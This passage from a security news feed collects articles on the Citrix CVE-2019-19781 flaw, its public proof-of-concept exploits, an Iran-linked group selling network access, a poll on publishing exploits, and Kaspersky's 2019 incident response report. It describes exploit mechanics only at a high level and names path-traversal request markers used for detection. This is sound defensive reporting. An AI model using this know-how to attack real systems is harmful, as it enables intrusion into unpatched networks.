week](<https://blog.qualys.com/laws-of-vulnerabilities/2020/01/08/citrix-adc-and-gateway-remote-code-execution-vulnerability-cve-2019-19781>). \u201cOnce exploited, remote attackers could obtain access to private network resources without requiring authentication.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nA patch will not be available until late January, Citrix [has announced](<https://support.citrix.com/article/CTX267027>). That leaves various systems worldwide open to the flaw \u2014 and now, with PoC exploits available on GitHub, researchers expect exploit attempts to skyrocket.\n\n## Exploit PoC Code\n\nOver three weeks after CVE-2019-19781 was first [disclosed (on Dec. 17)](<https://support.citrix.com/article/CTX267027>), this past weekend PoC exploit code for [was released Friday by](<https://github.com/projectzeroindia/CVE-2019-19781>) \u201cProject Zero India,\u201d which describe themselves as \u201ca group of security researchers from India, inspired by Google\u2019s Project Zero.\u201d\n\nThe PoC exploit consists of two curl commands: One to write a template file which would include a user\u2019s shell command, and the second request to download the result of the command execution.\n\nAfter Project Zero India released its exploit, another PoC exploit was released by[ security research group TrustedSec.](<https://github.com/trustedsec/cve-2019-19781/>) This PoC was similar to the first, except it was written in Python and established a reverse shell.\n\nSecurity expert Kevin Beaumont, who dubbed the vulnerability \u201cShitrix,\u201d said on Twitter that the exploit PoC code means \u201cthis is going to get very messy.\u201d\n\nhttps://twitter.com/GossiTheDog/status/1215782882540695552\n\nIn addition, researchers have also[ released scanners](<https://github.com/trustedsec/cve-2019-19781>) and [honeypots](<https://github.com/MalwareTech/CitrixHoneypot>) to see if various servers are vulnerable to CVE-2019-19881.\n\n## The Flaw\n\nCitrix did not disclose many details about the vulnerability [in its security advisory](<https://support.citrix.com/article/CTX267027>), however, Qualys researchers said that the mitigation steps offered by Citrix suggest the flaw stems from the VPN handler failing to sufficiently sanitize user-supplied inputs.\n\n\u201cThe exploit attempt would include HTTP requests with \u2018/../\u2019 and \u2018/vpns/\u2019 in the URL. The responder policy rule checks for string \u201c/vpns/\u201d and if user is connected to the SSLVPN, and sends a 403 response,\u201d according to Qualys researchers.\n\nAccording to the Bad Packets Report, over 25,000 servers globally \u2014 with the most in the U.S., Germany and the UK \u2013 are vulnerable to CVE-2019-19781.\n\nhttps://twitter.com/bad_packets/status/1216635462011351040\n\nAffected by the vulnerability are: Citrix ADC and Citrix Gateway version 13.0 all supported builds, Citrix ADC and NetScaler Gateway version 12.1 all supported builds, Citrix ADC and NetScaler Gateway version 12.0 all supported builds, Citrix ADC and NetScaler Gateway version 11.1 all supported builds and Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds.\n\n## Mitigations\n\n\u201cCitrix expects to have firmware updates in the form of refresh builds to be available across all supported versions of Citrix ADC and Citrix Gateway before the end of January 2020,\u201d according to the Citrix security advisory.\n\nA patch will be released on Jan. 20 for Citrix ADC versions 11/12 and 13, while a patch for version 10 will be released Jan. 31, according to Citrix.\n\nIn the meantime, Citrix has released [mitigation steps](<https://support.citrix.com/article/CTX267679>) for CVE-2019-19781. Researchers are also urging customers to check their systems for exploit attempts using \u201cgrep\u201d for requests that contain \u201cvpns\u201d and \u201c..\u201d.\n\nSecurity experts like Dave Kennedy [took to Twitter](<https://twitter.com/HackingDave/status/1215800253246513155?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1215800253246513155&amp;ref_url=https%3A%2F%2Fwww.zdnet.com%2Farticle%2Fproof-of-concept-code-published-for-citrix-bug-as-attacks-intensify%2F>) meanwhile to warn customers to apply mitigations until a patch is available.\n\n> Can\u2019t emphasize enough \u2013 please please please do the mitigation steps for the Citrix exploit as soon as possible. \n> \n> This is going to be a really bad one folks. \n> \n> Easy to automate and exploit and is widely used across the Internet.\n> \n> Mitigation here: <https://t.co/jeF0UC6A9V>\n> \n> \u2014 Dave Kennedy (ReL1K) (@HackingDave) [January 11, 2020](<https://twitter.com/HackingDave/status/1215800253246513155?ref_src=twsrc%5Etfw>)\n\nMikhail Klyuchnikov of Positive Technologies, Gianlorenzo Cipparrone and Miguel Gonzalez of Paddy Power Betfair plc were credited with finding the flaw.\n\n_**Concerned about mobile security? **_[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) _**Top 8 Best Practices for Mobile App Security**__**, on Jan. 22 at 2 p.m. ET. **_**_Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts to discuss the secrets of building a secure mobile strategy, one app at a time._**_** **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)_**.**_\n", "modified": "2020-01-13T15:32:42", "published": "2020-01-13T15:32:42", "id": "THREATPOST:99610F4016AECF953EEE643779490F30", "href": "https://threatpost.com/unpatched-citrix-flaw-exploits/151748/", "type": "threatpost", "title": "Unpatched Citrix Flaw Now Has PoC Exploits", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-01T21:47:35", "bulletinFamily": "info", "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "description": "An APT group known as Pioneer Kitten, linked to Iran, has been spotted selling corporate-network credentials on hacker forums. The credentials would let other cybercriminal groups and APTs perform cyberespionage and other nefarious cyber-activity.\n\nPioneer Kitten is a hacker group that specializes in infiltrating corporate networks using open-source tools to compromise remote external services. Researchers observed an actor associated with the group advertising access to compromised networks on an underground forum in July, according to a [blog post](<https://www.crowdstrike.com/blog/who-is-pioneer-kitten/>) Monday from Alex Orleans, a senior intelligence analyst at CrowdStrike Intelligence.\n\nPioneer Kitten\u2019s work is related to other groups either sponsored or run by the Iranian government, which [were previously seen](<https://www.zdnet.com/article/iranian-hackers-have-been-hacking-vpn-servers-to-plant-backdoors-in-companies-around-the-world/>) hacking VPNs and planting backdoors in companies around the world.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIndeed, the credential sales on hacker forums seem to suggest \u201ca potential attempt at revenue stream diversification\u201d to complement \u201cits targeted intrusions in support of the Iranian government,\u201d Orleans wrote. However, Pioneer Kitten, which has been around since 2017, does not appear to be directly operated by the Iranian government but is rather sympathetic to the regime and likely a private contractor, Orleans noted.\n\nPioneer Kitten\u2019s chief mode of operations is its reliance on SSH tunneling, using open-source tools such as Ngrok and a custom tool called SSHMinion, he wrote. The group uses these tools to communicate \u201cwith implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP)\u201d to exploit vulnerabilities in VPNs and network appliances to do its dirty work, Orleans explained.\n\nCrowdStrike observed the group leveraging several critical exploits in particular \u2014 [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and most recently, [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>). All three are exploits affect VPNs and networking equipment, including Pulse Secure \u201cConnect\u201d enterprise VPNs, Citrix servers and network gateways, and F5 Networks BIG-IP load balancers, respectively.\n\nPioneer Kitten\u2019s targets are North American and Israeli organizations in various sectors that represent some type of intelligence interest to the Iranian government, according to CrowdStrike. Target sectors run the gamut and include technology, government, defense, healthcare, aviation, media, academic, engineering, consulting and professional services, chemical, manufacturing, financial services, insurance and retail.\n\nWhile not as well-known or widespread in its activity as other nation-state threats such as China and Russia, Iran has emerged in recent years as a formidable cyber-enemy, amassing a number of APTs to mount attacks on its political adversaries.\n\nOf these, Charming Kitten\u2014which also goes by the names APT35, Ajax or Phosphorus\u2014appears to be the most active and dangerous, while others bearing similar names seem to be spin-offs or support groups. Iran overall appears to be ramping up its cyber-activity lately. CrowdStrike\u2019s report actually comes on the heels of news that Charming Kitten also has [resurfaced recently. ](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>)A new campaign is using LinkedIn and WhatsApp to convince targets \u2014 including Israeli university scholars and U.S. government employees \u2014 to click on a malicious link that can steal credentials.\n\nOperating since 2014, Charming Kitten is known for politically motivated and socially engineered attacks, and often uses phishing as its attack of choice. Targets of the APT, which uses clever social engineering to snare victims, have been [email accounts](<https://threatpost.com/iran-linked-hackers-target-trump-2020-campaign-microsoft-says/148931/>) tied to the Trump 2020 re-election campaign and [public figures and human-rights activists](<https://threatpost.com/charming-kitten-uses-fake-interview-requests-to-target-public-figures/152628/>), among others.\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) Learn the secrets to running a successful Bug Bounty Program. [Register today](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) for this FREE Threatpost webinar \u201c[Five Essentials for Running a Successful Bug Bounty Program](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) webinar.**\n", "modified": "2020-09-01T13:35:19", "published": "2020-09-01T13:35:19", "id": "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "href": "https://threatpost.com/pioneer-kitten-apt-sells-corporate-network-access/158833/", "type": "threatpost", "title": "Pioneer Kitten APT Sells Corporate Network Access", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T23:18:05", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781", "CVE-2020-24400", "CVE-2020-24407"], "description": "When it comes to the release of proof-of-concept (PoC) exploits, more security experts agree that the positives outweigh the negatives, according to a recent and informal Threatpost poll.\n\n[](<https://register.gotowebinar.com/register/7679724086205178371?source=art>)Last week, [Threatpost conducted a reader poll](<https://threatpost.com/poll-published-poc-exploits-good-bad/151966/>) and almost 60 percent of 230 security pundits thought it was a \u201cgood idea\u201d to publish PoC code for zero days. Up to 38 percent of respondents, meanwhile, argued it wasn\u2019t a good idea.\n\nThe debate comes on the heels of PoC code being released last week for an [unpatched remote-code-execution vulnerability](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products. The PoC exploits, which were published to showcase how the vulnerability in a system can be exploited, raised questions about the positive and negative consequences of releasing such code for an unpatched vulnerability.\n\nSome argued that the code can be used to test networks and pinpoint vulnerable aspects of a system, as well as motivate companies to patch, but others in the security space have argued that PoC code gives attackers a blueprint to launch and automate attacks.\n\n## Security Motivator\n\nMany security experts point to the role of PoC code publication in motivating impacted companies and manufacturers to adopt more effective security measures. That was the argument of one such advocate, Dr. Richard Gold, head of security engineering at Digital Shadows, who said that PoC code enables security teams to test if their systems are exploitable or not.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/21153903/tp-poll.png>)\n\n\u201cRather than having to rely on vendor notifications or software version number comparisons, a PoC allows the direct verification of whether a particular system is exploitable,\u201d Gold told Threatpost. \u201cThis ability to independently verify an issue allows organizations to better understand their exposure and make more informed decisions about remediation.\u201d\n\nIn fact, up to 85 percent of respondents said that the release of PoC code acts as an \u201ceffective motivator\u201d to push companies to patch. Seventy-nine percent say that the disclosure of a PoC exploit has been \u201cinstrumental\u201d in preventing an attack. And, 85 percent of respondents said that a PoC code release is acceptable if a vendor won\u2019t fix a bug in a timely manner.\n\nWhen it comes to the[ recent Citrix vulnerability (CVE-2019-19781)](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) for instance, advocates argue that, though PoC exploits were released before a patch was available, the code drew attention to the large amounts of vulnerable devices that were online. Citrix has also [accelerated its patch schedule](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) after PoC exploits were released (though there is no proof of correlation between this and the PoC exploit releases).\n\n\u201cAs a result [of the Citrix PoC exploits], there has been a widespread effort to patch or mitigate vulnerable devices rather than leaving them unpatched or unsecured,\u201d Gold stressed.\n\n## A Jump in Actual Exploits\n\nOn the flip-side of the argument, many argue that the release of the Citrix PoC exploits were a bad idea. They say attacks attempting to exploit the vulnerability skyrocketed as bad actors rushed to exploit the vulnerabilities before they are patched. In fact, 38 percent of respondents in Threatpost\u2019s poll argued that PoC exploit releases are a bad idea.\n\nMatt Thaxton, senior consultant at Crypsis Group, thinks that the \u201cultimate function of a PoC is to lower the bar for others to begin making use of the exploit.\u201d[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/21154131/tp-poll-2.png>)\n\n\u201cI believe there are more negatives than positives to publishing proofs, and generally, it is not a good idea,\u201d he told Threatpost. \u201cIn many cases, PoC\u2019s are put out largely for the notoriety/fame of the publisher and for the developer to \u2018flex\u2019 their abilities.\u201d\n\nJoseph Carson, chief security scientist at Thycotic, told Threatpost that while he thinks PoC exploits can have a positive impact, \u201cit is also important to include what defenders can do to reduce the risks such a methods to harden systems or best practices.\u201d\n\n\u201cLet\u2019s be realistic, once a zero-day is known, it is only a matter of time before nation states and cybercriminals are abusing them,\u201d said Carson. \u201cSometimes they already know about the zero-day and have been abusing them for years.\u201d\n\nRespondents in the poll were also split about the right amount of time that\u2019s appropriate to release PoC code after a flaw has been disclosed, with 29 percent arguing 90 days is the appropriate amount and others opting for one month (25 percent), one week (23 percent) or two weeks (14 percent).\n\nThis issue of a PoC exploit timeline also brings up important questions around patch management for companies dealing with the fallout of publicly-released code. Some, like Thaxton, say that PoC exploit advocates fail to recognize the complexity of patching large environments: \u201cI believe the release of PoC code functions more like an implied threat to anyone that doesn\u2019t patch: \u2018You\u2019d better patch . . . or else,'\u201d he said \u201cThis kind of threat would likely be unacceptable outside of the infosec world. This is even more obvious when PoCs are released before or alongside a patch for the vulnerability.\u201d\n\n## PoC Exploits Surge\n\nAt the end of the day, PoC exploits are continuing to be published. In fact, beyond the release of the Citrix PoC code, a slew of other PoC exploits were released last week, [including ones for](<https://threatpost.com/poc-exploits-published-for-microsoft-crypto-bug/151931/>) a recently patched [crypto-spoofing vulnerability](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) found by the [National Security Agency](<https://threatpost.com/podcast-nsa-reports-major-crypto-spoofing-bug-to-microsoft/151900/>) (NSA) and [reported to Microsoft](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>); and another for critical flaws impacting the [Cisco Data Center Network Manager](<https://threatpost.com/cisco-dcnm-flaw-exploit/151949/>) tool for managing network platforms and switches.\n\nGold, for his part, argued that distinguishing a fine line between a theoretical vulnerability and a successful exploitation of a real system makes all the difference when it comes to PoC exploits versus active exploits.\n\n\u201cOnce that threshold has been crossed, it is understood that attackers will most likely be exploiting this vulnerability in real attacks,\u201d he said. \u201cThis often provided impetus to companies to patch their systems.\u201d\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. _**_**Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from **_**_Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Featured](<https://threatpost.com/category/featured/>)\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "modified": "2020-01-22T11:01:52", "published": "2020-01-22T11:01:52", "id": "THREATPOST:48D622E76FCC26F28B32364668BB1930", "href": "https://threatpost.com/poc-exploits-do-more-good-than-harm-threatpost-poll/152053/", "type": "threatpost", "title": "PoC Exploits Do More Good Than Harm: Threatpost Poll", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2020-08-07T08:03:43", "bulletinFamily": "blog", "cvelist": ["CVE-2018-7600", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-19781"], "description": "\n\n[ Download full report (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/06094905/Kaspersky_Incident-Response-Analyst_2020.pdf>)\n\nAs an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries&#x27; cyber-incident tactics and techniques used in the wild. In this report, we share our teams&#x27; conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights, this report will cover the affected industries, the most widespread attack tactics and techniques, how long it took to detect and stop adversaries after initial entry and the most exploited vulnerabilities. The report also provides some high-level recommendations on how to increase resilience to attacks.\n\nThe insights used in this report come from incident investigations by Kaspersky teams from around the world. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. The work of the Computer Incidents Investigation Unit (CIIU) and the Global Research and Analysis Team (GReAT) are also included in this report.\n\n## Executive summary\n\nIn 2019, we noticed greater commitment among victims to understand the root causes of cyberattacks and improve the level of cybersecurity within their environments to reduce the probability of similar attacks taking place again in the future.\n\nAnalysis showed that less than a quarter of received requests turned out to be false positives, mostly after security tools issued alerts about suspicious files or activity. The majority of true positive incidents were triggered by the discovery of suspicious files, followed by encrypted files, suspicious activity and alerts from security tools.\n\nMost of the incident handling requests were received from the Middle East, Europe, the CIS and Latin America, from a wide spectrum of business sectors, including industrial, financial, government, telecoms, transportation and healthcare. Industrial businesses were the most affected by cyberattacks, with oil and gas companies leading the way. They were followed by financial institutions, dominated by banks, which bore the brunt of all money theft incidents in 2019. Ransomware&#x27;s presence continued in 2019 and was felt most by government bodies, telecoms and IT companies in various regions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105355/sl_incident_response_01.png>)\n\n### \n\n### Verticals and industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105442/sl_incident_response_02.png>)\n\nAdversaries used a variety of initial vectors to compromise victims&#x27; environments. Initial vectors included exploitation, misconfiguration, insiders, leaked credentials and malicious removable media. But the most common were exploitation of unpatched vulnerabilities, malicious emails, followed by brute-force attacks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110209/sl_incident_response_03.png>)\n\nIn addition to exploiting vulnerabilities, adversaries used several legitimate tools in different attack phases. This made attacks harder to discover and allowed the adversaries to keep a low profile until their goals were achieved. Most of the legitimate tools were used for credential harvesting from live systems, evading security, network discovery and unloading security solutions.\n\nAlthough we started working on incidents the first day of a request in 70% of cases, analysis revealed that the time between attack success and its discovery varies between an average of one day in ransomware incidents to 10 days in cases of financial theft, up to 122 days in cyber-espionage and data-theft operations.\n\n## Recommendations\n\nBased on 2019 incident response insights, applying the following recommendations can help protect businesses from falling victim to similar attacks:\n\n * Apply complex password policies\n * Avoid management interfaces exposed to the internet\n * Only allow remote access for necessary external services with multi-factor authentication \u2013 with necessary privileges only\n * Regular system audits to identify vulnerable services and misconfigurations\n * Continually tune security tools to avoid false positives\n * Apply powerful audit policy with log retention period of at least six months\n * Monitor and investigate all alerts generated by security tools\n * Patch your publicly available services immediately\n * Enhance your email protection and employee awareness\n * Forbid use of PsExec to simplify security operations\n * Threat hunting with rich telemetry, specifically deep tracing of PowerShell to detect attacks\n * Quickly engage security operations after discovering incidents to reduce potential damage and/or data loss\n * Back up your data frequently and on separated infrastructure\n\n \n\n## Reasons for incident response\n\nSignificant effects on infrastructure, such as encrypted assets, money loss, data leakage or suspicious emails, led to 30% of requests for investigations. More than 50% of requests came as a result of alerts in security toolstacks: endpoint (EPP, EDR), network (NTA) and others (FW, IDS/IPS, etc.).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110347/sl_incident_response_04.png>)\n\nOrganizations often only become aware of an incident after a noticeable impact, even when standard security toolstacks have already produced alerts identifying some aspects of the attack. Lack of security operations staff is the most common reason for missing these indicators. Suspicious files identified by security operations and suspicious endpoint activity led to the discovery of an incident in 75% of cases, while suspicious network activities in 60% of cases were false positives.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110436/sl_incident_response_05.png>)\n\nOne of the most common reasons for an incident response service request is a ransomware attack: a challenge even for mature security operations. For more details on types of ransomware and how to combat it, view our story &quot;[Cities under ransomware siege](<https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/>)&quot;.\n\n \n\n## Distribution of reasons for top regions\n\nA suspicious file is the most prevalent reason to engage incident response services. This shows that file-oriented detection is the most popular approach in many organizations. The distribution also shows that 100% of cases involving financial cybercrime and data leakage that we investigated occurred in CIS countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110519/sl_incident_response_06.png>)\n\n## Distribution of reasons for industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110612/sl_incident_response_07.png>)\n\nAlthough, different industries suffered from different incidents, 100% of money theft incidents occurred inside the financial industry (banks).\n\nDetection of ransomware once the repercussions had been felt occurred primarily within the government, telecom and IT sectors.\n\n## Initial vectors or how adversaries get in\n\nCommon initial vectors include the exploitation of vulnerabilities (0- and 1-day), malicious emails and brute-force attacks. Patch management for 1-day vulnerabilities and applying password policies (or not using management interfaces on the internet) are well suited to address most cases. 0-day vulnerabilities and social engineering attacks via email are much harder to address and require a decent level of maturity from internal security operations.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110706/sl_incident_response_08.png>)\n\nBy linking the popular initial compromise vectors with how an incident was detected, we can see detected suspicious files were detected from malicious emails. And cases detected after file encryption mostly took place after brute-force or vulnerability exploitation attacks. \nSometimes we act as complimentary experts for a primary incident response team from the victim&#x27;s organization and we have no information on all of their findings \u2013 hence the &#x27;Unknown reasons&#x27; on the charts. Malicious emails are most likely to be detected by a variety of security toolstack, but that&#x27;s not showing distrubution of 0- to 1-day vulnerabilities.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110805/sl_incident_response_09.png>)\n\nThe distribution of how long an attack went unnoticed and how an organization was compromised shows that cases that begin with vulnerability exploitation on an organization&#x27;s network perimeter went unnoticed for longest. Social enginnering attacks via email were the most short-lived.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110857/sl_incident_response_10.png>)\n\n## Tools and exploits\n\n### 30% of all incidents were tied to legitimate tools\n\nIn cyberattacks, adversaries use legitimate tools which can&#x27;t be detected as malicious utilities as they are often used in everyday activities. Suspicious events that blend with normal activity can be identified after deep analysis of a malicious attack and connecting the use of such tools to the incident. The top used tools are PowerShell, PsExec, SoftPerfect Network Scanner and ProcDump.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110943/sl_incident_response_11.png>)\n\nMost legitimate tools are used for harvesting credentials from memory, evading security mechanisms by unloading security solutions and for discovering services in the network. PowerShell can be used virtually for any task.\n\nLet&#x27;s weight those tools based on occurrence in incidents \u2013 we will also see tactics (MITRE ATT&amp;CK) where they are usually applied.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111024/sl_incident_response_12.png>)\n\n### Exploits\n\nMost of the identified exploits in incident cases appeared in 2019 along with a well-known remote code execution vulnerability in Windows SMB service (MS17-010) being actively exploited by a large number of adversaries.\n\n**MS17-010** _SMB service in Microsoft Windows_ \nRemote code execution vulnerability that was used in several large attacks such as WannaCry, NotPetya, WannaMine, etc. | **CVE-2019-0604** _Microsoft Sharepoint_ \nRemote code execution vulnerability allows adversaries to execute arbitrary code without authentication in Microsoft Sharepoint. | **CVE-2019-19781** _Citrix Application Delivery Controller &amp; Citrix Gateway_ \nThis vulnerability allows unauthenticated remote code execution on all hosts connected to Citrix infrastructure. \n---|---|--- \n**CVE-2019-0708** _RDP service in Microsoft Windows_ \nRemote code execution vulnerability (codename: BlueKeep) for a very widespread and, unfortunately, frequently publicly available RDP service. | **CVE-2018-7600** _Drupal_ \nRemote code execution vulnerability also known as Drupalgeddon2. Widely used in installation of backdoors, web miners and other malware on compromised web servers. | **CVE-2019-11510** _Pulse Secure SSL VPN_ \nUnauthenticated retrieval of VPN server user credentials. Instant access to victim organization through legitimate channel. \n \n## Attack duration\n\nFor a number of incidents, Kaspersky specialists have established the time period between the beginning of an adversary&#x27;s activity and the end of the attack. As a result of the subsequent analysis, all incidents were divided into three categories of attack duration.\n\n**Rush hours or days** | **Average weeks** | **Long-lasting months or longer** \n---|---|--- \nThis category includes attacks lasting up to a week. These are mainly incidents involving ransomware attacks. Due to the high speed of development, effective counteraction to these attacks is possible only by preventive methods. \nIn some cases, a delay of up to a week has been observed between the initial compromise and the beginning of the adversary&#x27;s activity. | This group includes attacks that have been developing for a week or several weeks. In most cases, this activity was aimed at the direct theft of money. Typically, the adversaries achieved their goals within a week. | Incidents that lasted more than a month were included in this group. This activity is almost always aimed at stealing sensitive data. \nSuch attacks are characterized by interchanging active and passive phases. The total duration of active phases is on average close to the duration of attacks from the previous group. \n**Common threat:** \nRansomware infection | **Common threat:** \nFinancial theft | **Common threat:** \nCyber-espionage and theft of confidential data \n**Common attack vector:**\n\n * Downloading of a malicious file by link in email\n * Downloading of a malicious file from infected site\n * Exploitation of vulnerabilities on network perimeter\n * Credentials brute-force attack\n| **Common attack vector:**\n\n * Downloading a malicious file by link in email\n * Exploitation of vulnerabilities on network perimeter\n| **Common attack vector:**\n\n * Exploitation of vulnerabilities on network perimeter \n**Attack duration (median):** \n1 day | **Attack duration (median):** \n10 days | **Attack duration (median):** \n122 days \n**Incident response duration:** \nHours to days | **Incident response duration:** \nWeeks | **Incident response duration:** \nWeeks \n \n## Operational metrics\n\n### False positives rate\n\nFalse positives in incident responses are a very expensive exercise. A false positive means that triage of a security event led to the involvement of incident response experts who later ascertained that there was no incident. Usually this is a sign that an organization doesn&#x27;t have a specialist in threat hunting or they are managed by an external SOC that doesn&#x27;t have the full context for an event.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111207/sl_incident_response_13.png>)\n\n### Age of attack\n\nThis is the time taken to detect an incident by an organization after an attack starts. Usually detecting the attack in the first few hours or even days is good; with more low-profile attacks it can take weeks, which is still OK, but taking months or years is definitely bad.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111254/sl_incident_response_14.png>)\n\n## How fast we responded\n\nHow long it took us to respond after an organization contacted us. 70% of the time we start work from day one, but in some cases a variety of factors can influence the timeframe.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111342/sl_incident_response_15.png>)\n\n## How long response took\n\nDistribution of the time required for incident response activities can vary from a few hours to months based on how deep the adversaries were able to dig into the compromised network and how old the first compromise is.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111429/sl_incident_response_16.png>)\n\n## **MITRE ATT&amp;CK tactics and techniques**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111538/sl_incident_response_17.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111649/sl_incident_response_18.png>)\n\n## Conclusion\n\nIn 2019, the cyberattack curve was not flattened. There was an increase in the number of incidents accompanied by greater commitment among victims to understand the full attack picture. Victims from all regions suffered from a variety of attacks and all business types were targeted.\n\nImproved security and audit planning with continuous maintenance of procedures along with rapid patch management could have minimized damages and losses in many of the analyzed incidents. In addition, having security monitoring and an investigation plan either on-premises or performed by a third party could have helped in stopping adversaries in the early phases of the attack chain, or start detections immediately after compromise.\n\nVarious tactics and techniques were used by adversaries to achieve their targets, trying multiple times till they succeeded. This indicates the importance of security being an organized process with continuous improvements instead of separate, independent actions.\n\nAdversaries made greater use of legitimate tools in different phases of their cyberattacks, especially in the early phases. This highlights the need to monitor and justify the use of legitimate administration tools and scanning utilities within internal networks, limiting their use to administrators and necessary actions only.\n\nApplying a powerful auditing policy with a log retention period of at least six months can help reduce analysis times during incident investigation and help limit the types of damage caused. Having insufficient logs on endpoints and network levels means it takes longer to collect and analyze evidence from different data sources in order to gain a complete picture of an attack.", "modified": "2020-08-06T10:00:34", "published": "2020-08-06T10:00:34", "id": "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "href": "https://securelist.com/incident-response-analyst-report-2019/97974/", "type": "securelist", "title": "Incident Response Analyst Report 2019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2020-04-30T23:04:13", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise 